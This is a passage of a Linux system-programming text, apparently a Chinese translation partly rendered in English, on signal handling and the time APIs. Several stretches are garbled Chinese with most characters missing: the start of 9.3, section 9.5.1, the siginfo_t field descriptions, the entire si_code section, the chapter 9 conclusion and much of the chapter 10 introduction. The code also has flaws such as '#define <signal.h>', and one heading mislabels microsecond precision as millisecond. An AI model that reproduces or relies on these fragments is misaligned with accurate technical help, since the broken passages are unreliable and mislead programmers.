When a process is first executed, all signals are set to their default actions, unless the parent process (the one executing the new program) is ignoring them, in which case the newly executed process also ignores them. Put another way: any signal the parent had set to be caught reverts to the default action in the new process, and all other signal behavior remains as it was. This makes sense — a freshly executed process does not share its parent's address space, so any registered handler no longer exists.

This behavior has a notable use: when the shell executes a process "in the background" (or when one background process executes another), the newly executed process should ignore the interrupt and quit characters. Before a shell-executed process installs handlers for SIGINT and SIGQUIT, it should therefore check that the signals are not already being ignored:
/* handle SIGINT, but only if it isn't being ignored */
if (signal (SIGINT, SIG_IGN) != SIG_IGN) {
        if (signal (SIGINT, sigint_handler) == SIG_ERR)
                fprintf (stderr, "Failed to handle SIGINT!\n");
}

/* handle SIGQUIT, but only if it isn't being ignored */
if (signal (SIGQUIT, SIG_IGN) != SIG_IGN) {
        if (signal (SIGQUIT, sigquit_handler) == SIG_ERR)
                fprintf (stderr, "Failed to handle SIGQUIT!\n");
}
Needing to set a signal's behavior just to discover its current behavior is an obvious drawback of the signal() interface; sigaction(), discussed later, avoids it.

fork() behaves differently: a child created via fork() inherits exactly its parent's signal semantics. This, too, makes sense — the child shares the parent's address space, so the parent's signal handlers still exist in the child.
9.2.4 映射信号编号为字符串
In the examples so far, we hard-coded signal names. It is often convenient (and sometimes required) to map a signal number to its textual name. The sys_siglist array, indexed by signal number, holds those names:
The BSD-derived psignal() is also common, and Linux supports it:

#include <signal.h>

void psignal (int signo, const char *msg);

A call to psignal() prints to stderr the string given by msg, followed by a colon, a space, and the name of the signal given by signo. If signo is invalid, the output says so.

A better interface is strsignal(). It is nonstandard, but Linux and many other systems support it:

#define _GNU_SOURCE
#include <string.h>

char *strsignal (int signo);

A call to strsignal() returns a pointer to a description of the signal given by signo. If signo is invalid, the returned description typically says so (some Unix systems supporting this function return NULL instead). The returned string is valid only until the next invocation of strsignal(), so the function is not thread-safe.
Going with sys_siglist is usually the safe bet. Using it, we could rewrite our earlier signal handler to print the name of the signal it caught:

static void signal_handler (int signo)
{
        printf ("Caught %s\n", sys_siglist[signo]);
}
9.3 发送信号
kill() 调我们的 kill 以的 kill()
进程进程
#include <sys/types.h>
#include <signal.h>
int kill (pid_t pid, int signo);
In its usual use (pid greater than 0), kill() sends the signal signo to the process identified by pid.

If pid is 0, signo is sent to every process in the invoking process's process group.

If pid is -1, signo is sent to every process the invoking process has permission to signal, except itself and init. (We discuss process groups in Chapter 5.)

If pid is less than -1, signo is sent to the process group -pid.

On success, kill() returns 0. The call counts as a success so long as even a single signal was delivered. On failure (no signal sent), it returns -1, setting errno to one of:

EINVAL  The signal given by signo is invalid.

EPERM   The invoking process lacks permission to send a signal to any of the requested recipients.

ESRCH   The process or process group denoted by pid does not exist, or the process is a zombie.
To send a signal, a process needs suitable permissions. A process with the CAP_KILL capability (usually one owned by root) can signal any process. Otherwise, the sending process's effective or real user ID must equal the receiving process's real or saved user ID. Put simply, a user may send signals only to processes that he or she owns.

Unix systems, Linux included, make an exception for SIGCONT: a process may send it to any other process in the same session, regardless of user IDs.

If signo is 0 — the null signal mentioned earlier — no signal is sent, but the permission checks still occur: kill() thereby serves to test whether a process may signal a given target.
9.3.2 例子
Here is how to send SIGHUP to the process whose pid is 1722:
int ret;

ret = kill (1722, SIGHUP);
if (ret)
        perror ("kill");
This snippet has the same effect as running:

$ kill -HUP 1722

To check that we have permission to signal 1722, without actually sending any signal:
int ret;

ret = kill (1722, 0);
if (ret)
        ; /* we lack permission */
else
        ; /* we have permission */
9.3.3 给自己发送信号
raise() 单的进程给自的方
#include <signal.h>
int raise (int signo);
The call

raise (signo);

is equivalent to

kill (getpid ( ), signo);

It returns 0 on success and nonzero on failure; it does not set errno.
9.3.4 给整个进程组发送信号
There is also an easy way to send a signal to every process in a particular process group, for those who find negating the group ID and calling kill() clumsy:

#include <signal.h>

int killpg (int pgrp, int signo);

The call

killpg (pgrp, signo);

is equivalent to

kill (-pgrp, signo);

This holds even for a pgrp of 0, in which case the signal goes to every process in the invoking process's group. On success, killpg() returns 0; on failure, -1, with errno set to one of:

EINVAL  The signal given by signo is invalid.

EPERM   The invoking process lacks permission to signal any of the requested recipients.

ESRCH   The process group denoted by pgrp does not exist.
9.4 重入
When the kernel raises a signal, a process may be executing anywhere. It might be in the middle of an important operation that, if interrupted, would leave the process in an inconsistent state — a data structure half updated, say, or a calculation half performed. The process might even be handling another signal.

Signal handlers cannot tell what code was running when the signal hit; they can arrive in the middle of anything. Any handler your process installs should therefore be very careful about the actions it takes and the data it touches. Signal handlers must avoid assumptions about what the process was doing when interrupted — in particular, exercise caution when modifying global (that is, shared) data. Indeed, the safest policy is never to touch shared data from a signal handler at all. Temporarily blocking signal delivery, discussed shortly, is one way to juggle handler work against the process's other operations.

What about system calls and other library functions? Suppose a process is midway through writing a file or allocating memory, and its signal handler writes to the same file or also invokes malloc(); or the process was inside a function that uses a static buffer, such as strsignal(), when the signal was delivered. What's a handler to do? A function is reentrant if it is safe to call from within itself (or, concurrently, from another thread in the same process). To qualify as reentrant, a function must not manipulate static data, must manipulate only stack-allocated or caller-provided data, and must not invoke any non-reentrant function.
9.4.1 有保证的可重入函数
When writing a signal handler, you have to assume that the interrupted process could have been stopped inside a non-reentrant function (or, viewed another way, anywhere at all). Thus, signal handlers must invoke only reentrant functions.

A list of functions guaranteed safe has been codified: POSIX.1-2003 enumerates the functions that are required to be reentrant and safe to call from a signal handler on all conforming platforms. Table 9-2 lists them.
abort()
accept()
access()
aio error()
aio return()
aio suspend()
alarm()
bind()
cfgetispeed()
cfgetospeed()
cfsetispeed()
cfsetospeed()
chdir()
chmod()
chown()
clock gettime()
close()
connect()
creat()
dup()
dup2()
execle()
execve()
Exit()
exit()
fchmod()
fchown()
fcntl()
fdatasync()
fork()
fpathconf()
fstat()
fsync()
ftruncate()
getegid()
geteuid()
getgid()
getgroups()
getpeername()
getpgrp()
getpid()
getppid()
getsockname()
getsockopt()
getuid()
kill()
link()
listen()
lseek()
lstat()
mkdir()
mkfifo()
open()
pathconf()
pause()
pipe()
poll()
posix trace event()
pselect()
raise()
read()
readlink()
recv()
recvfrom()
recvmsg()
rename()
rmdir()
select()
sem post()
send()
sendmsg()
sendto()
setgid()
setpgid()
setsid()
setsockopt()
setuid()
shutdown()
sigaction()
sigaddset()
sigdelset()
sigemptyset()
sigfillset()
sigismember()
signal()
sigpause()
sigpending()
sigprocmask()
sigqueue()
sigset()
sigsuspend()
sleep()
socket()
socketpair()
stat()
symlink()
sysconf()
tcdrain()
tcflow()
tcflush()
tcgetattr()
tcgetpgrp()
tcsendbreak()
tcsetattr()
tcsetpgrp()
time()
timer getoverrun()
timer gettime()
timer settime()
times()
umask()
This is more than you might suspect, but signal handlers must take heed: Linux and POSIX guarantee nothing about the reentrancy of any function not on this list.
9.5 信号集
Several of the signal-management interfaces still to come — such as those for blocking signals or examining pending ones — operate on sets of signals. The following standardized operations manage sigset_t signal sets:
#include <signal.h>
int sigemptyset (sigset_t *set);
int sigfillset (sigset_t *set);
int sigaddset (sigset_t *set, int signo);
int sigdelset (sigset_t *set, int signo);
int sigismember (const sigset_t *set, int signo);
sigemptyset() initializes the signal set given by set, marking it empty (all signals excluded); sigfillset() initializes it full (all signals included). Both return 0. You should call one of the two on any new signal set before use, to place it in a defined state.

sigaddset() adds signo to the set given by set; sigdelset() removes it. Both return 0 on success, or -1 on error, with errno set to EINVAL, meaning signo is not a valid signal identifier.

sigismember() returns 1 if signo is in the set given by set, 0 if it is not, and -1 on error — in which case errno is again set to EINVAL, meaning signo is invalid.
9.5.1 更多的信号集函数
上的 POSIX 的以何的 Unix
。 Linux 提的
#define _GNU_SOURCE
#define <signal.h>
int sigisemptyset (sigset_t *set);
int sigorset (sigset_t *dest, sigset_t *left,
sigset_t *right);
int sigandset (sigset_t *dest, sigset_t *left,
sigset_t *right);
sigisemptyset() returns 1 if the signal set given by set is empty, and 0 otherwise. sigorset() stores in dest the union (binary OR) of the sets left and right; sigandset() stores in dest their intersection (binary AND). Both return 0 on success and -1 on error, setting errno to EINVAL. These functions are handy, but programs aiming for strict POSIX portability should avoid them.
9.6 阻塞信号
We have seen that signal handlers run asynchronously, interrupting whatever code happens to be executing, and that handlers must therefore be careful not to tread on the data the interrupted code might be using. Programs need a way to control this more explicitly — to mark critical regions during which delivery should wait, and to manage the interplay between the main program and its handlers.

The mechanism is blocking. A blocked signal is not delivered until it is unblocked; a process may block any number of signals, and the set of signals it blocks is called its signal mask. POSIX specifies, and Linux implements, an interface for manipulating a process's signal mask:
#include <signal.h>
int sigprocmask (int how,
const sigset_t *set,
sigset_t *oldset);
The behavior of sigprocmask() depends on the value of how, one of:

SIG_SETMASK  The signal mask of the invoking process is set to set.

SIG_BLOCK    The signals in set are added to the mask: the new mask is the union (binary OR) of the current mask and set.

SIG_UNBLOCK  The signals in set are removed from the mask: the new mask is the intersection (binary AND) of the current mask and the negation (binary NOT) of set. Unblocking a signal that is not blocked is not an error.

If oldset is non-NULL, it receives the previous signal mask. If set is NULL, how is ignored and the mask is not changed, but oldset is still filled in — so passing NULL for set is the way to query the current mask.

On success, the call returns 0. On failure, it returns -1, with errno set to EINVAL, meaning how was invalid, or EFAULT, meaning set or oldset was an invalid pointer.

Blocking SIGKILL or SIGSTOP is not allowed; sigprocmask() silently ignores any attempt to place either in the mask.
9.6.1 获取待处理信号
When the kernel raises a blocked signal, the signal is not delivered. Such undelivered signals are called pending. When a pending signal is unblocked, the kernel delivers it to the process. POSIX defines a function for examining the set of pending signals:

#include <signal.h>

int sigpending (sigset_t *set);

A successful call to sigpending() stores the set of pending signals in set and returns 0. On failure, it returns -1, setting errno to EFAULT, meaning set is an invalid pointer.
9.6.2 等待信号集
A third POSIX function, sigsuspend(), lets a process atomically change its signal mask and sleep until a signal is delivered that either terminates the process or is handled:

#include <signal.h>

int sigsuspend (const sigset_t *set);

While sigsuspend() sleeps, the process's signal mask is temporarily replaced by set. If a signal is caught, sigsuspend() returns -1 after the handler finishes, with errno set to EINTR; if set is an invalid pointer, errno is set to EFAULT.

A common use is retrieving signals that may have arrived while a critical region was protected: the process blocks them with sigprocmask(), saving the previous mask in oldset; after leaving the critical region, it calls sigsuspend() with oldset for set, atomically restoring the old mask and waiting.
9.7 高级信号管理
The signal() function examined at the start of this chapter is elementary: it is defined by the C standard, which had to accommodate the lowest common denominator of operating systems, and consequently offers only minimal signal management. As an alternative, POSIX standardizes the sigaction() system call, which provides vastly superior signal management: among other things, you can specify a set of signals to block while the handler runs, and the handler can receive detailed information about the signal and the state of the system at delivery:
#include <signal.h>
int sigaction (int signo,
const struct sigaction *act,
struct sigaction *oldact);
A call to sigaction() changes the behavior of the signal signo, which may be any signal except SIGKILL and SIGSTOP. If act is non-NULL, the behavior of the signal is set as described by act. If oldact is non-NULL, the previous (or current, if act is NULL) behavior is stored there.

The sigaction structure allows fine-grained control. It is defined in the header <sys/signal.h>, included by <signal.h>, as follows:

struct sigaction {
        void (*sa_handler)(int);   /* signal handler or action */
        void (*sa_sigaction)(int, siginfo_t *, void *);
        sigset_t sa_mask;          /* signals to block */
        int sa_flags;              /* flags */
        void (*sa_restorer)(void); /* obsolete and non-POSIX */
};
The sa_handler field dictates the action taken on receipt of the signal. As with signal(), it may be SIG_DFL, denoting the default action; SIG_IGN, instructing the kernel to ignore the signal; or a pointer to a handler function with the same prototype used by signal():
void my_handler (int signo);
If sa_flags includes SA_SIGINFO, then sa_sigaction, not sa_handler, designates the handler, and its prototype differs slightly:

void my_handler (int signo, siginfo_t *si, void *ucontext);

The signal number arrives as the first parameter, a siginfo_t structure as the second, and a ucontext_t structure (cast to a void pointer) as the third. The siginfo_t, discussed in the next section, hands the handler a wealth of information.

(Note that on some machines, sa_handler and sa_sigaction may share storage in a union; do not assign to both.)

The sa_mask field names a set of signals to block while the handler runs, letting programmers enforce protection among handler invocations. The delivered signal itself is blocked for the duration of its handler unless SA_NODEFER is set in sa_flags. SIGKILL and SIGSTOP cannot be blocked; the call silently strips them from sa_mask.

The sa_flags field is zero, one, or more of the following flags affecting the handling of signo:

SA_NOCLDSTOP  If signo is SIGCHLD, do not deliver notification when a child process stops or resumes.

SA_NOCLDWAIT  If signo is SIGCHLD, enable automatic reaping: children do not become zombies on termination, and the parent need not (and cannot) call wait() on them. See Chapter 5 for details on children, zombies, and wait().

SA_NOMASK     An obsolete, non-POSIX equivalent of SA_NODEFER (described below). Use SA_NODEFER instead, but be prepared to see this flag in older code.

SA_ONESHOT    An obsolete, non-POSIX equivalent of SA_RESETHAND (described below). Use SA_RESETHAND instead, but expect this flag in older code.

SA_ONSTACK    Deliver the given signal on an alternative signal stack registered with sigaltstack(). If no alternative stack is registered, the default stack is used — that is, the kernel behaves as if the flag were not given. Alternative signal stacks are rare, though useful in some pthreads applications whose smaller thread stacks might overflow under heavy handler use. We will not discuss sigaltstack() further.

SA_RESTART    Enable BSD-style restarting of system calls interrupted by signals.

SA_NODEFER    Do not block the delivered signal while its handler executes.

SA_RESETHAND  One-shot mode: the signal's behavior reverts to the default as soon as it is delivered.

The sa_restorer field is obsolete, no longer used on Linux, and not part of POSIX. Pretend it isn't there; never touch it.

On success, sigaction() returns 0. On failure, the call returns -1, with errno set to one of:

EFAULT  act or oldact is an invalid pointer.

EINVAL  signo is an invalid signal, SIGKILL, or SIGSTOP.
9.7.1 siginfo t 结构
The siginfo_t structure is also defined in <sys/signal.h>, as follows:

typedef struct siginfo_t {
        int si_signo;      /* signal number */
        int si_errno;      /* errno value */
        int si_code;       /* signal code */
        pid_t si_pid;      /* PID of sender */
        uid_t si_uid;      /* real UID of sender */
        int si_status;     /* exit value or signal */
        clock_t si_utime;  /* user time consumed */
        clock_t si_stime;  /* system time consumed */
        sigval_t si_value; /* signal payload value */
        int si_int;        /* POSIX.1b signal */
        void *si_ptr;      /* POSIX.1b signal */
        void *si_addr;     /* memory location that caused fault */
        int si_band;       /* band event */
        int si_fd;         /* file descriptor */
};
This structure is rife with information passed to the signal handler (if sa_sigaction is used in lieu of sa_handler). In the modern Unix world, it debunks the notion of signals as a poor IPC mechanism: the structure identifies, among other things, the signal's origin and reason. Many of the fields are valid only for certain signals; the important ones follow:
的进程的以及
的原。以对的
si signo 的。的处理程提(
的。
si errno 零示的。对的
效。
si code
进程以及(自 kill()出。我们
能的。对的效。
si pid
对 SIGCHLD示进程的 PID。
si uid
对 SIGCHLD示进程自的 UID。
si status 对 SIGCHLD示进程的出。
si utime 对 SIGCHLD示进程的时间。
si stime 对 SIGCHLD示进程的时间。
si value si int si ptr 的。
si int
对 sigqueue() 的(的的
以作。
si ptr
对 sigqueue() 的(的的
以 void 作。
si addr
对 SIGBUS SIGFPE SIGILL SIGSEGV SIGTRAP void
的。对 SIGSEGV内
存的( NULL。
si band
对 SIGPOLL示 si fd 出的文件的。
si fd
对 SIGPOLL示操作的文件的。
si value si int si ptr 相对的进程以们给
进程何。以们或
的(进程空间的。
的的。
POSIX 对效的。的处理相
的时。 SIGPOLL 时 si fd 。
9.7.2 si code 的精彩世界
si code 的原。对的
何的。对内的的原。
以的 si code 对何效的。们何 /
。
SI ASYNCIO 异步 I/O (。
SI KERNEL
内。
SI MESGQ
POSIX 的(的
内。
SI QUEUE
sigqueue() (。
SI TIMER
POSIX 时超时(。
SI TKILL
tkill() 或 tgkill() 。调程的
的内。
SI SIGIO
SIGIO 。
SI USER
kill() 或 raise() 。
以的 si code 对 SIGBUS 效。们件的
BUS ADRALN 进程对(间对对的。
BUS ADRERR 进程效的理。
BUS OBJERR
进程的件。
对 SIGCHLD以的示子进程给进程时的
CLD CONTINUED 子进程。
CLD DUMPED
子进程。
CLD EXITED
子进程 exit() 。
CLD KILLED
子进程。
CLD STOPPED
子进程。
CLD TRAPPED
子进程进。
以的对 SIGFPE 效。们的
FPE FLTDIV
进程以 0 的。
FPE FLTOVF 进程出的。
FPE FLTINV
进程效的。
FPE FLTRES
进程或效的。
FPE FLTSUB 进程超出的。
FPE FLTUND 进程的。
FPE INTDIV
进程以 0 的。
FPE INTOVF 进程出的。
以 si code 对 SIGILL 效。们的性
ILL ILLADR 进程进的式。
ILL ILLOPC
进程的操作。
ILL ILLOPN 进程的操作。
ILL PRVOPC 进程操作。
ILL PRVREG 进程存上。
ILL ILLTRP
进程进的。
对的 si addr 操作的。
对 SIGPOLL以的的 I/O 件
POLL ERR I/O 。
POLL HUP 设备或。
POLL IN
文件读。
POLL MSG 。
POLL OUT 文件能写。
POLL PRI
文件读的。
以的对 SIGSEGV 效存的
SEGV ACCERR 进程以效的方式效的内存进程
内存的。
SEGV MAPERR 进程效的内存。
对 si addr 操作的。
对 SIGTRAP si code 进的
TRAP BRKPT 进程进。
TRAP TRACE 进程进。
si code 。
9.8 发送带附加信息的信号
As seen in the preceding sections, handlers registered with the SA_SIGINFO flag receive a siginfo_t, whose si_value field is a payload handed from the signal's generator to its recipient. The POSIX-defined sigqueue() lets a process send a signal with such a payload:

#include <signal.h>

int sigqueue (pid_t pid,
              int signo,
              const union sigval value);

sigqueue() behaves much like kill(): on success, the signal given by signo is queued to the process or process group given by pid, and the call returns 0. The signal's payload is given by value, an integer/pointer union:
union sigval {
int sival_int;
void *sival_ptr;
};
On failure, the call returns -1, with errno set to one of:

EINVAL  The signal given by signo is invalid.

EPERM   The invoking process lacks permission to signal any of the requested recipients (permissions are the same as for kill()).

ESRCH   The process or process group denoted by pid does not exist or, if a process, is a zombie.
9.8.1 例子
This example sends SIGUSR2, with a payload of the integer 404, to the process whose pid is 1722:
union sigval value;
int ret;

value.sival_int = 404;
ret = sigqueue (1722, SIGUSR2, value);
if (ret)
        perror ("sigqueue");
If process 1722 handles SIGUSR2 with an SA_SIGINFO handler, it finds signo set to SIGUSR2, si->si_int set to 404, and si->si_code set to SI_QUEUE.
9.9 结论
Unix 程的。们时的内间
的能原的进程间。程程
件的。
然我们们。内(
进程的操作的方式。 Unix(Linux
进程理 / 子进程的方式。我们们。
的理写出的的处理程
。能的处理程 9-2 出的(以
们的。
的 程 然 signal() kill()
sigaction() sigqueue() 理 。 小 的
SA SIGINFO 的处理程时的性。
我喜(我文件的的
实上 Linux 内的们的
Linux 的实以的(。
第 10 章
时间
时间操作程。内
时间
墙上时间(或真实时间)
真实世的实时间墙上的时间。进程
以及件时间时墙上时间。
进程时间
即进程的时间空间的时间内进程
上的时间。进程对程进时 (
操作时)。 Linux 的进程时墙上时间
操作的进程时间能墙上时间。进程相
时周 I/O(。
单调时间
时间性的。 Linux 内的操作
的时间(的时间。墙上时间能 (
以进设或调校时间),
性。时间方的
的时间示方。单调时间的性以时间
性性时间的。
单调时间相对时间墙上时间对绝对时间更理
。
时间方以以式
相对时间
相对时间(时的子 5
或 10 。
绝对时间
示何的时间 1968 3 25 。
相对绝对时间式的。进程能 500 内
新 60 或操作 7 。
相对时间。能存聚 2
8 文件将文件时写的时间(5
的相对时间的时示自的相
对时间。
Unix 1970 1 1 00:00:00以
的示绝对时间。 UTC(调世时 GMT(林
时间或时间。的 Unix 即绝对时间
更相对的。 Unix 的存自
以的我们将。
件时内的时操作件时时间进
程。内率的周时时
(system timer)。时间时内将时间单
tick 或 jiffy。 jiffy 的作 jiffy (jiffies counter)。
jiffy 以 32 2.6 Linux 内 64 进。∗
Linux 的时率 HZ同的
。 HZ 的相的 Linux ABI 的
程能能。上 x86
100示时 100 (时的率
100HZ。 jiffy 的 0.01 1/HZ 。 2.6 Linux 内内
HZ 的子提 1000 jiffy 的 0.001 。然
2.6.13 的 HZ 250 jiffy 0.004 。∗ HZ 的
的上以的能提的更的时
。
进程何的 HZ POSIX 时
时率的
long hz;

hz = sysconf (_SC_CLK_TCK);
if (hz == -1)
        perror ("sysconf"); /* should never occur */

∗ The Linux kernel can also run with a dynamic or tickless timer — that is, without a fixed-interval jiffy tick — in which case timer-related kernel work is scheduled only when actually needed.
∗ HZ is a kernel compile-time option; on x86 it may be 100, 250, or 1000. User space cannot depend on any particular value of HZ.
程时率的时将
时间 POSIX 出的时间
或 HZ 的。 HZ 同的
的率 ABI 的 x86 上的 100。以时周
的 POSIX CLOCKS PER SEC 示的率。
件。时
然时时间然。
的件时时存时间。内时件时
时间。同时内将时间写件时
。理以 hwclock 将时更新时间。
理 Unix 的时间进程
的设墙上时间时间段时间进
的时间以及时。时间相的内。我们
将 Linux 示时间的。
10.1 时间的数据结构
As Unix systems evolved, they developed several data structures for representing the seemingly simple concept of time, ranging from a plain integer count to multi-field "broken-down" structures. We examine these structures before diving into the functions that manipulate them.
10.1.1 原始表示
The simplest type is time_t, defined in the header <time.h>. Intended to be opaque, time_t is nevertheless, on most Unix systems — Linux included — a simple typedef to the C long type:

typedef long time_t;
time_t represents the number of seconds elapsed since the epoch. A typical reaction: "That'll overflow before long!" It will in fact last longer than you might expect, but sufficiently long-lived Unix systems will indeed still be running then. With a 32-bit long, time_t can represent up to 2,147,483,647 seconds past the epoch: on Monday, January 18, 2038, at 22:14:07, things get interesting. By then, we can expect most systems and software to have gone 64-bit.
10.1.2 毫秒级精度
Tied to time_t is a precision problem: a lot can happen in a second. The timeval structure extends time_t with microsecond precision. It is defined in <sys/time.h>:
#include <sys/time.h>
struct timeval {
time_t tv_sec; /* seconds */
suseconds_t tv_usec; /* microseconds */
};
tv_sec measures seconds and tv_usec microseconds. The confusing suseconds_t is normally a typedef for an integer type.
10.1.3 纳秒级精度
Unsatisfied with mere microseconds, the timespec structure raises the precision to nanoseconds. It is defined in <time.h>:
#include <time.h>
struct timespec {
time_t tv_sec; /* seconds */
long tv_nsec; /* nanoseconds */
};
Given the choice, nanosecond beats microsecond precision, and interfaces that deal with time have generally preferred timespec wherever they have been revised; plenty of important interfaces, however, still use timeval. In practice, neither structure delivers its advertised accuracy — the granularity of the system timer sets the real bound, and that is often no better than milliseconds — but the finer-grained type can represent whatever precision the system does offer.
实时提的何
提的能提的。
的的以提的。
10.1.4 “分解”时间
None of the structures so far matches how humans state a time — a month, a day, an hour. The C standard's tm structure "breaks down" Unix time into pieces people can understand. It is defined in <time.h>:
struct tm {
int tm_sec; /* seconds */
int tm_min; /* minutes */
int tm_hour; /* hours */
int tm_mday; /* the day of the month */
int tm_mon; /* the month */
int tm_year; /* the year */
int tm_wday; /* the day of the week */
int tm_yday; /* the day in the year */
int tm_isdst; /* daylight savings time? */
#ifdef _BSD_SOURCE
long tm_gmtoff; /* time zone’s offset from
GMT */
const char *tm_zone; /* time zone
abbreviation */
#endif /* _BSD_SOURCE */
};
The tm structure makes it much easier to grasp what a time_t value of, say, 314159 means in human terms — which weekday, which hour. As a representation it costs more space, but converting to and from it is convenient whenever a time must be displayed or parsed.
The fields of the tm structure are:

tm_sec    Seconds after the minute. Normally 0 to 59, but may be as high as 61 to allow for up to two leap seconds.

tm_min    Minutes after the hour: 0 to 59.

tm_hour   Hours past midnight: 0 to 23.

tm_mday   Day of the month: 1 to 31. POSIX does not specify the value 0; Linux, however, uses it to denote the last day of the preceding month.

tm_mon    Months since January: 0 to 11.

tm_year   Years since 1900.

tm_wday   Days since Sunday: 0 to 6.

tm_yday   Days since January 1: 0 to 365.

tm_isdst  Positive if daylight saving time (DST) is in effect for the time described by the other fields, 0 if it is not, and negative if unknown.

tm_gmtoff The time zone's offset from Greenwich Mean Time, in seconds. This field is present only if _BSD_SOURCE is defined before including <time.h>.

tm_zone   The abbreviation of the current time zone, such as EST. This field, too, requires _BSD_SOURCE.
10.1.5 一种进程时间类型
The type clock_t represents clock ticks. It is an integer type, often a long. Depending on the interface, the ticks are expressed in units of the system's actual timer frequency (HZ) or of CLOCKS_PER_SEC.
10.2 POSIX 时钟
的调 POSIX 时实示时间
的。 clockid t 示的 POSIX 时 Linux
CLOCK MONOTONIC
何 进 程 设 的 单 调 的 时
。示自以的
时间。
CLOCK PROCESS CPUTIME ID 处理提给进程的时。
i386 上时时间
(TSC存。
CLOCK REALTIME
真实时间(墙上时间时。设时
。
CLOCK THREAD CPUTIME ID 进 程 的 时 程
的。 POSIX 时间
CLOCK REALTIME 实的。
然 Linux 提时的
CLOCK REALTIME。
10.3 时间源精度
POSIX defines clock_getres() for obtaining the resolution of a given time source:

#include <time.h>

int clock_getres (clockid_t clock_id,
                  struct timespec *res);

A successful call to clock_getres() stores the resolution of the clock specified by clock_id in res — which may be NULL, in which case the resolution is discarded — and returns 0. On failure, the call returns -1 and sets errno to one of:

EFAULT  res is an invalid pointer.

EINVAL  clock_id is not a valid time source on this system.
The following snippet prints the resolution of the time sources discussed earlier:

clockid_t clocks[] = {
        CLOCK_REALTIME,
        CLOCK_MONOTONIC,
        CLOCK_PROCESS_CPUTIME_ID,
        CLOCK_THREAD_CPUTIME_ID,
        (clockid_t) -1 };
int i;

for (i = 0; clocks[i] != (clockid_t) -1; i++) {
        struct timespec res;
        int ret;

        ret = clock_getres (clocks[i], &res);
        if (ret)
                perror ("clock_getres");
        else
                printf ("clock=%d sec=%ld nsec=%ld\n",
                        clocks[i], res.tv_sec, res.tv_nsec);
}
On a typical x86 system, the output looks something like this:
clock=0 sec=0 nsec=4000250
clock=1 sec=0 nsec=4000250
clock=2 sec=0 nsec=1
clock=3 sec=0 nsec=1
Notice that 4,000,250 nanoseconds is 4 milliseconds, or 0.004 seconds — which is the expected resolution of the x86 system clock when HZ is 250, as on this machine. Thus the CLOCK_REALTIME and CLOCK_MONOTONIC resolutions track jiffies and the system timer. By contrast, the two processor-time clocks offer much finer resolution, backed on x86 by the high-resolution TSC.

On Linux (as on most other Unix systems), the POSIX clock functions live in the librt library; the preceding snippet must therefore be linked accordingly, for example:

$ gcc -Wall -W -O2 -lrt -g -o snippet snippet.c
10.4 取得当前时间
Applications commonly want the current time — to display it to the user, to compute relative or elapsed time, or to stamp an event. The simplest and historically most common way to obtain it is time():
#include <time.h>
time_t time (time_t *t);
A call to time() returns the current time, represented as the number of seconds elapsed since the epoch. If t is not NULL, the function also writes the current time into the provided pointer. On error, the call returns -1 (cast to a time_t) and sets errno; the only possible value is EFAULT, meaning t is an invalid pointer.
For example:

time_t t;

printf ("current time: %ld\n", (long) time (&t));
printf ("the same value: %ld\n", (long) t);
A naive but common view treats time_t as the literal count of seconds since the epoch. Unix convention, however, ignores leap seconds, counting each day as exactly 86,400 seconds, so the value is only an approximation of the "real" elapsed seconds. The discrepancy rarely matters.
10.4.1 一个更好的接口
gettimeofday() extends time() by offering microsecond resolution:
#include <sys/time.h>
int gettimeofday (struct timeval *tv,
struct timezone *tz);
A successful call to gettimeofday() places the current time in the timeval structure pointed at by tv and returns 0. The timezone structure and the tz parameter are obsolete; neither should be used on Linux — always pass NULL for tz.

An example:
struct timeval tv;
int ret;

ret = gettimeofday (&tv, NULL);
if (ret)
        perror ("gettimeofday");
else
        printf ("seconds=%ld useconds=%ld\n",
                (long) tv.tv_sec, (long) tv.tv_usec);
The timezone structure is obsolete because the kernel no longer manages time zones, and glibc refuses to fill in its tz_dsttime field. We will look at handling time zones shortly.
10.4.2 一个高级接口
POSIX also provides clock_gettime() for obtaining the time of a specific time source. More useful still, the call offers nanosecond resolution:
#include <time.h>
int clock_gettime (clockid_t clock_id,
struct timespec *ts);
On success, the call returns 0 and stores the current time of the time source clock_id in ts. On failure, it returns -1 and sets errno to EFAULT, meaning ts is an invalid pointer, or EINVAL, meaning clock_id is not a valid time source on this system:
clockid_t clocks[] = {
        CLOCK_REALTIME,
        CLOCK_MONOTONIC,
        CLOCK_PROCESS_CPUTIME_ID,
        CLOCK_THREAD_CPUTIME_ID,
        (clockid_t) -1 };
int i;

for (i = 0; clocks[i] != (clockid_t) -1; i++) {
        struct timespec ts;
        int ret;

        ret = clock_gettime (clocks[i], &ts);
        if (ret)
                perror ("clock_gettime");
        else
                printf ("clock=%d sec=%ld nsec=%ld\n",
                        clocks[i], ts.tv_sec, ts.tv_nsec);
}
10.4.3 取得进程时间
times() 系统调用获取正在运行的当前进程及其子进程的进程时间,进程时间以时钟滴答数表示:
#include <sys/times.h>
struct tms {
clock_t tms_utime; /* user time consumed */
clock_t tms_stime; /* system time consumed */
clock_t tms_cutime; /* user time consumed by
children */
clock_t tms_cstime; /* system time consumed
by children */
};
clock_t times (struct tms *buf);
成功时,调用会将当前进程及其子进程消耗的进程时间写入 buf 指向的 tms 结构体中。统计的时间分为用户时间和系统时间。用户时间是在用户空间执行代码所用的时间;系统时间是在内核空间执行所用的时间(例如执行系统调用或处理缺页异常所用的时间)。每个子进程的统计数据,只有在该子进程终止,且父进程对其调用了 waitpid()(或相关函数)之后,才会被计入。调用成功时,返回单调递增的时钟滴答数。
过去,该返回值是自系统启动以来的滴答数,因此可以通过两次 times() 调用返回值之差计算流逝的时间(滴答数也可以换算成秒)。现在,内核会在返回值上加一个偏移量,以便尽早暴露那些无法正确处理滴答数回绕的程序错误。因此,返回值的绝对值意义不大,而两次调用之间的相对差值仍然有意义。
失败时,调用返回 -1,并设置 errno。在 Linux 上,唯一可能的错误码是 EFAULT,表示 buf 是非法指针。
10.5 设置当前时间
乍看起来,设置当前日期和时间似乎不是应用程序该做的事情:很少有程序需要把墙钟时间设置为某个给定值。不过这种需求确实存在,典型的例子就是提供时间设置功能的工具(比如 date 命令)。
最简单的设置时间接口,是与 time() 相对应的 stime():
#define _SVID_SOURCE
#include <time.h>
int stime (time_t *t);
成功调用 stime() 时,系统时间被设置为 t 指向的值,并返回 0。调用者需要拥有 CAP_SYS_TIME 权限;一般来说,只有 root 用户才有该权限。
失败时,调用返回 -1,并设置 errno 为 EFAULT(表示 t 是非法指针)或 EPERM(表示调用者没有 CAP_SYS_TIME 权限)。
其用法相当简单:
time_t t = 1;
int ret;
/* set time to one second after the epoch */
ret = stime (&t);
if (ret)
perror ("stime");
稍后我们将看到,如何方便地把常用的时间表示形式转换为 time_t 类型的值。
10.5.1 高精度定时
